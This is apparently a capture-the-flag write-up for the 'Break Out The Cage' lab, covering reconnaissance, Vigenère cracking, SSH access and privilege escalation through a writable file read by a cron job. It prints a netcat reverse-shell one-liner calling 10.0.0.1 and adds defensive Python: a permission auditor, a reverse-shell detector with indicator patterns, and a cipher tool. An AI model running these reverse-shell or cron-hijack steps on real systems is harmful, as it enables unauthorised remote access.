Break Out The Cage

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.96.253

Detailed Nmap scan:

Command breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Scan only ports 21, 22 and 80

  • (-oN nmap): Save the output to a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.96.253

Enumeration

Port 21: FTP

Anonymous login is allowed, so let's check it out and download the files on the server.

Let's read the file.

Looks like it's encrypted; let's crack it using CyberChef.

It looks like it has been encrypted twice, so let's find out what this says too.

This looks like a password. We could try logging into SSH with it, but let's first check port 80 (HTTP).

Port 80: HTTP

Looking at the page, we have a username: Weston. None of the links on the page work, so let's run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.96.253/

There is nothing of interest in the /scripts directory, and the /contracts directory contains only an empty file. The /auditions directory has an interesting file.

Let's download this to our machine.

We can inspect this file with a tool called Sonic Visualiser, so let's open the file in the app.

Now go to Pane, then Add Spectrogram, and click the first option. We are doing this to add a spectrogram so that we can look for hidden data.

We can see a box; let's see what it says.

After changing the color to get a better visual, we can see that it says namelesstwo. Checking around, I found out that this is the key for the Vigenère cipher that we can use to crack the text we found before.

We have the same text we found before, so let's log in through SSH now with the username we found at the start, Weston.

As the password worked, we can answer the first question.

Privilege Escalation

I was looking around when a message popped up.

It looks like there is a cron job running that executes this script every few minutes, so let's go find it. I was searching for a while and could not find it, so let's transfer a tool called pspy onto this machine and have it find the cron file.

To transfer this file, let's start an HTTP listener on our machine and download the file on the victim machine with wget. If you just downloaded it, make sure to make it executable.

Now let's start an HTTP server.

Now let's download the file on the victim's machine.

Let's make the file executable.

Now run the file.

Looking through the output, we find an interesting file which may be the one we are looking for.

Let's check this file.

Let's add a reverse shell to the .quotes file (as the .quotes file is being printed every few minutes) so that we can get access as a higher-privileged user, namely the owner of the file ./opt/.dads_scripts/.files/.quotes, cage. We can see this when we look at the permissions of the file.
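The root cause of this step is a data file that a scheduled task reads as one user while another user can write to it. The audit below is an added example (not part of the original writeup and not the box's own files): it walks a directory tree, flags regular files that carry the "other" write bit, and strips that bit as the fix. The demo tree it builds in a temporary directory is constructed; the script name print_quote.sh is a hypothetical stand-in for whatever the cron job actually runs.

```python
import os
import stat
import tempfile


def world_writable_files(root: str) -> list[str]:
    """Return regular files under `root` (as relative paths) that any local user can modify.

    Such a file is dangerous as soon as a scheduled task running as another
    account reads or executes it: whoever can write the file controls what
    that account does.
    """
    flagged = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat so symlinks are not followed
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                flagged.append(os.path.relpath(path, root))
    return sorted(flagged)


def remove_world_write(root: str) -> int:
    """Clear the 'other' write bit on every flagged file; return how many were fixed."""
    fixed = 0
    for rel in world_writable_files(root):
        path = os.path.join(root, rel)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~stat.S_IWOTH)
        fixed += 1
    return fixed


def build_demo_tree() -> str:
    """Constructed stand-in for a hidden script directory (not the real box's files):
    one script a cron job would run, and the data file it reads left world-writable."""
    root = tempfile.mkdtemp(prefix="cron_audit_")
    os.makedirs(os.path.join(root, ".files"))
    script = os.path.join(root, "print_quote.sh")  # hypothetical script name
    quotes = os.path.join(root, ".files", ".quotes")
    with open(script, "w") as fh:
        fh.write('#!/bin/sh\ncat "$(dirname "$0")/.files/.quotes"\n')
    with open(quotes, "w") as fh:
        fh.write("constructed quote line\n")
    os.chmod(script, 0o755)  # owner-writable only: fine
    os.chmod(quotes, 0o666)  # writable by everyone: this is the finding
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print("flagged:", world_writable_files(demo))
    print("fixed:", remove_world_write(demo))
    print("after:", world_writable_files(demo))
```

Run it against the directory a cron entry points at (or at /opt as a whole) rather than the demo tree to get a real finding. The check only covers the "other" write bit; a file writable by a group that an untrusted user belongs to is just as bad, so extend the mode test with S_IWGRP plus a group membership check if that applies to the host.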

The reverse shell we will be using is this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Let's echo the reverse shell into the file and start a netcat listener.

After a while, you should get a reverse shell.

Let's stabilize the shell.

Let's read the file in this directory.
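From the defender's side, the tell-tale of this step is a single command line that creates a named pipe, runs an interactive shell and hands its output to a network client. The following is an added example (not from the original writeup) of a small detector for that pattern, run over a constructed process-execution log written in pspy's "CMD:" style; the UIDs, PIDs, timestamps and the script name print_quote.sh are sample values, not captured from the box.

```python
import re

# Constructed process-execution log in a pspy-like "CMD:" layout (sample data, not real output).
SAMPLE_LOG = """\
2024/01/01 10:00:01 CMD: UID=1001 PID=1502 | /bin/sh -c /opt/.dads_scripts/print_quote.sh
2024/01/01 10:00:01 CMD: UID=1001 PID=1503 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
2024/01/01 10:00:05 CMD: UID=0    PID=1510 | /usr/sbin/cron -f
2024/01/01 10:00:07 CMD: UID=1000 PID=1511 | nc -z localhost 80
"""

LINE_RE = re.compile(r"UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")

# Each indicator on its own is common on a healthy host; it is the combination of a
# named pipe feeding an interactive shell whose output reaches a network client that matters.
INDICATORS = {
    "fifo": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"/(?:ba)?sh\s+-i\b"),
    "network_client": re.compile(r"\b(?:nc|ncat|netcat)\b|/dev/tcp/"),
    "stderr_merge": re.compile(r"2>&1"),
}


def classify(command: str) -> list[str]:
    """Return the names of the indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def detect_reverse_shells(log_text: str, threshold: int = 3) -> list[tuple[str, str, list[str]]]:
    """Return (uid, pid, indicators) for each command matching at least `threshold` indicators."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        uid, pid, command = m.groups()
        found = classify(command)
        if len(found) >= threshold:
            hits.append((uid, pid, found))
    return hits


if __name__ == "__main__":
    for uid, pid, found in detect_reverse_shells(SAMPLE_LOG):
        print(f"suspicious command: uid={uid} pid={pid} indicators={found}")
```

The threshold of three keeps an ordinary "nc -z" port check (one indicator) from firing. In production the same indicator set applies to auditd EXECVE records or an EDR's process-creation events; the "nc" word-boundary match is the noisiest of the four and is the first thing to tune if the host legitimately runs netcat.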

We have the user flag.

Next, let's cd into the email backup folder and read all the files.

Looking through the files, the only interesting thing I found is the string in the third email and the number of times the word FACE has been used. This might be something that will help us, so let's copy it and try to crack it using CyberChef.

So FACE was actually the key to crack this password, and this is the password for the root account. Let's switch users and read the root flag.
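Both ciphertexts in this box (the FTP file under the key namelesstwo, and the string in the third email under the key FACE) are plain Vigenère, which CyberChef handles in one step. As an added example that is not part of the original writeup, here is the cipher written out, plus the known-plaintext key recovery that explains why a leaked key is fatal for it: every letter pair gives away one key letter, and the key's period shows up as soon as the stream repeats. The plaintext used in the demo is constructed; the two keys are the ones the writeup found.

```python
import string

ALPHABET = string.ascii_uppercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Apply a Vigenère shift to the letters of `text` using `key`.

    Only letters are shifted (case is preserved); any other character passes
    through unchanged and does not consume a key letter, which matches how
    CyberChef's Vigenère operations treat spaces and punctuation.
    """
    shifts = [ALPHABET.index(c) for c in key.upper() if c.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out = []
    pos = 0  # index into the key; advances only on letters
    for ch in text:
        if ch.isalpha():
            shift = shifts[pos % len(shifts)]
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_key(plaintext: str, ciphertext: str) -> str:
    """Recover the repeating key from a known plaintext/ciphertext pair.

    Each letter pair yields one key letter ((c - p) mod 26); the shortest
    period of that key stream is returned, so "FACEFACEFAC" collapses to "FACE".
    """
    stream = []
    for p, c in zip(plaintext, ciphertext):
        if p.isalpha() and c.isalpha():
            stream.append(ALPHABET[(ord(c.upper()) - ord(p.upper())) % 26])
        elif p.isalpha() != c.isalpha():
            raise ValueError("plaintext and ciphertext letters do not line up")
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return "".join(stream[:period])
    return "".join(stream)


if __name__ == "__main__":
    # Constructed demo plaintext; the keys are the two found in the writeup.
    sample = "attack at dawn"
    for key in ("namelesstwo", "FACE"):
        ct = vigenere(sample, key)
        print(f"key={key!r}: {ct!r} -> {vigenere(ct, key, decrypt=True)!r}")
    print("recovered key:", recover_key(sample, vigenere(sample, "FACE")))
```

Paste the real ciphertext from the FTP file or the email in place of the constructed sample and call vigenere(..., decrypt=True) with the matching key to reproduce the CyberChef result offline. The recover_key function is the reason the spectrogram and the email counts were enough: a four-letter key repeated across a message is recovered from any twelve known letters.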
